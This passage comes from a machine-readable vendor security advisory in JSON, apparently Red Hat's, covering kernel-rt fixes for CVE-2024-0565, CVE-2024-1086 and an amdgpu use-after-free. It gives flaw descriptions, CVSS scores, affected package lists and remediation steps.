"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c"
},
{
"cve": "CVE-2024-0565",
"cwe": {
"id": "CWE-191",
"name": "Integer Underflow (Wrap or Wraparound)"
},
"discovery_date": "2024-01-15T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2258518"
}
],
"notes": [
{
"category": "description",
"text": "An out-of-bounds memory read flaw was found in receive_encrypted_standard in fs/smb/client/smb2ops.c in the SMB Client sub-component in the Linux Kernel. This issue occurs due to integer underflow on the memcpy length, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability considered being Moderate impact because of limitations for attack scenario.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-0565"
},
{
"category": "external",
"summary": "RHBZ#2258518",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258518"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-0565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0565"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-0565",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0565"
},
{
"category": "external",
"summary": "https://www.spinics.net/lists/stable-commits/msg328851.html",
"url": "https://www.spinics.net/lists/stable-commits/msg328851.html"
}
],
"release_date": "2023-12-18T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-04-02T17:26:48+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1614"
},
{
"category": "workaround",
"details": "To mitigate this issue, prevent module cifs from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically.",
"product_ids": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client"
},
{
"cve": "CVE-2024-1086",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2024-01-31T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2262126"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Netfilter subsystem in the Linux kernel. This issue occurs in the nft_verdict_init() function, allowing positive values as a drop error within the hook verdict, therefore, the nf_hook_slow() function can cause a double-free vulnerability when NF_DROP is issued with a drop error that resembles NF_ACCEPT. The nf_tables component can be exploited to achieve local privilege escalation.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw is rated as having an Important impact. There is the limitation that it can only be exploited by a local user with access to Netfilter, but can still allow privilege escalation if user namespaces are enabled and Netfilter is being used.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
